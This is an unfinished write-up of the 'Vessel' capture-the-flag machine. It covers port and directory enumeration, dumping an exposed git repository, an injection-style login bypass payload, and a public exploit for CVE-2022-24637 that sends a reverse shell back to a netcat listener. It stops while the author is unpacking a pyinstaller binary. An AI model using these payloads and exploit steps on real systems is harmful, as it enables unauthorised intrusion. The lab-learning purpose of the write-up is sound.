Vessel

Let's start off with nmap:

nmap -sC -sV -T4 10.129.227.225
Host is up (0.058s latency).

Not shown: 998 closed tcp ports (conn-refused)

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey: 

|   3072 38c297327b9ec565b44b4ea330a59aa5 (RSA)

|   256 33b355f4a17ff84e48dac5296313833d (ECDSA)

|_  256 a1f1881c3a397274e6301f28b680254e (ED25519)

80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

|_http-server-header: Apache/2.4.41 (Ubuntu)

|_http-trane-info: Problem with XML parsing of /evox/about

|_http-title: Vessel

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Only ports 22 and 80 open. Let's skip SSH and head to http!

website-initial

Wappalyzer tells us that the site/backend is built with Express/Node JS and the footer reveals a domain vessel.htb. First, let's add that to our etc/hosts:

sudo nano /etc/hosts

File should look like this:

127.0.0.1       localhost

127.0.1.1       joonas-VirtualBox

# The following lines are desirable for IPv6 capable hosts

::1     ip6-localhost ip6-loopback

fe00::0 ip6-localnet

ff00::0 ip6-mcastprefix

ff02::1 ip6-allnodes

ff02::2 ip6-allrouters

10.129.227.225  vessel.htb

There also seems to be a login page: login-page

There's also a register page but it does not seem to be functioning.

Next, let's run gobuster to find endpoints/pages:

gobuster dir -u http://vessel.h

tb -w /opt/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt -t 30 

--exclude-length 26                                    

After not too long we get some results:

===============================================================

2023/01/16 19:52:40 Starting gobuster in directory enumeration mode

===============================================================

/js                   (Status: 301) [Size: 171] [--> /js/]

/logout               (Status: 302) [Size: 28] [--> /login]

/img                  (Status: 301) [Size: 173] [--> /img/]

/404                  (Status: 200) [Size: 2393]

/dev                  (Status: 301) [Size: 173] [--> /dev/]

/.                    (Status: 200) [Size: 15030]

/admin                (Status: 302) [Size: 28] [--> /login]

/register             (Status: 200) [Size: 5830]

/500                  (Status: 200) [Size: 2335]

/css                  (Status: 301) [Size: 173] [--> /css/]

/401                  (Status: 200) [Size: 2400]

/login                (Status: 200) [Size: 4213]

/reset                (Status: 200) [Size: 3637]

Dev seems interesting, let's check that out! It seems that /dev/ redirects us to 404:

dev-404

But earlier we got a 301 redirect from /dev which is strange. Also, brute forcing directories does not show any results. But since the pathname is dev maybe there's a git repository? Let's try using gitdumper. Note: sourcecode is the folder name where the script stores the results.

git-dumper http://vessel.htb/dev/ sourcecode                                     

git-dumper

That did it! Let's take a look of the login function:

login-source

At first it seems like there's nothing exploitable but according to this article this is not secure and we can bypass it with payload:

username=admin&password[password]=1

Basically, this payload structures the query like we are making query like this:

SELECT * FROM accounts WHERE username = 'admin' AND password = `password` = 1

which is always true if database has admin-named user.

Let's login and let Burpsuite intercept our request:

burp-login

We get in:

admin-page

The analytics-link leads us to another subdomain: openwebanalytics.vessel.htb ,let's add it to our /etc/hosts -file:

127.0.0.1       localhost

127.0.1.1       joonas-VirtualBox

# The following lines are desirable for IPv6 capable hosts

::1     ip6-localhost ip6-loopback

fe00::0 ip6-localnet

ff00::0 ip6-mcastprefix

ff02::1 ip6-allnodes

ff02::2 ip6-allrouters

10.129.227.225  vessel.htb openwebanalytics.vessel.htb

open-web-analytics

The analytics-site seems to be built with Open Web analytics which is open source software. Looking at the source code we even get the used version:

analytics-source

Quick Googling reveals us that the version 1.7.3 is vulnerable to CVE-2022-24637 and there is also a public PoC available on github! Let's download the exploit. Before running it, let's set a netcat listener on port 9001:

nc -lnvp 9001

Now, run the exploit:

python3 exploit.py http://openwebanalytics.vessel.htb/ 10.10.14.90 9001

And we get a shell as www-data!

joonas@joonas-VirtualBox:~$ nc -lnvp 9001

Listening on 0.0.0.0 9001

Connection received on 10.129.227.225 46914

ls

1

1ZDJPckC.php

cache.lock

whoami

www-data

We have access to user stevenĀ“s home folder and theres some kind of passwordGenerator app. Also, there's a notes folder with two files: notes.pdf and screenshot.png:

cd /home/steven

ls

passwordGenerator

ls -la

total 33796

drwxrwxr-x 3 steven steven     4096 Aug 11 14:43 .

drwxr-xr-x 4 root   root       4096 Aug 11 14:43 ..

lrwxrwxrwx 1 root   root          9 Apr 18  2022 .bash_history -> /dev/null

-rw------- 1 steven steven      220 Apr 17  2022 .bash_logout

-rw------- 1 steven steven     3771 Apr 17  2022 .bashrc

drwxr-xr-x 2 ethan  steven     4096 Aug 11 14:43 .notes

-rw------- 1 steven steven      807 Apr 17  2022 .profile

-rw-r--r-- 1 ethan  steven 34578147 May  4  2022 passwordGenerator

cd .notes

ls

notes.pdf

screenshot.png

After downloading the files to our machine (you can use netcat for that) Let's check what they are all about:

The passwordGenerator seems to be Microsoft executable:

joonas@joonas-VirtualBox:~/Documents/htb/vessel/$ file passwordGenerator

passwordGenerator: PE32 executable (console) Intel 80386, for MS Windows

joonas@joonas-VirtualBox:~/Documents/htb/vessel/$ 

The screenshot seems to be a photo of the app:

password-generator

And the notes.pdf is a password-protected pdf file. Time to reverse the generator.

Running strings on the app prints many instances of python and python 3.7 so chances are it is a python-based app. Binwalk also gives an impression that the file is encoded. Python based executables are usually made with pyinstaller and we can try to reverse it. Theres a package pyinstxtractor which can do this for us. It is good practice to use same Python version on our machine as the app was made in. In this case it's 3.7. For this we can use pyenv. After settings up python we can run the instxtractor:

 python pyinstxtractor.py ../reverse/passwordGenerator        
joonas@joonas-VirtualBox:~/Documents/htb/vessel/pyinstxtractor$ python pyinstxtractor.py ../passwordGenerator        

[+] Processing ../passwordGenerator

[+] Pyinstaller version: 2.1+

[+] Python version: 3.7

[+] Length of package: 34300131 bytes

[+] Found 95 files in CArchive

[+] Beginning extraction...please standby

[+] Possible entry point: pyiboot01_bootstrap.pyc

[+] Possible entry point: pyi_rth_subprocess.pyc

[+] Possible entry point: pyi_rth_pkgutil.pyc

[+] Possible entry point: pyi_rth_inspect.pyc

[+] Possible entry point: pyi_rth_pyside2.pyc

[+] Possible entry point: passwordGenerator.pyc

[+] Found 142 files in PYZ archive

[+] Successfully extracted pyinstaller archive: ../passwordGenerator

You can now use a python decompiler on the pyc files within the extracted directory

TO BE CONTINUED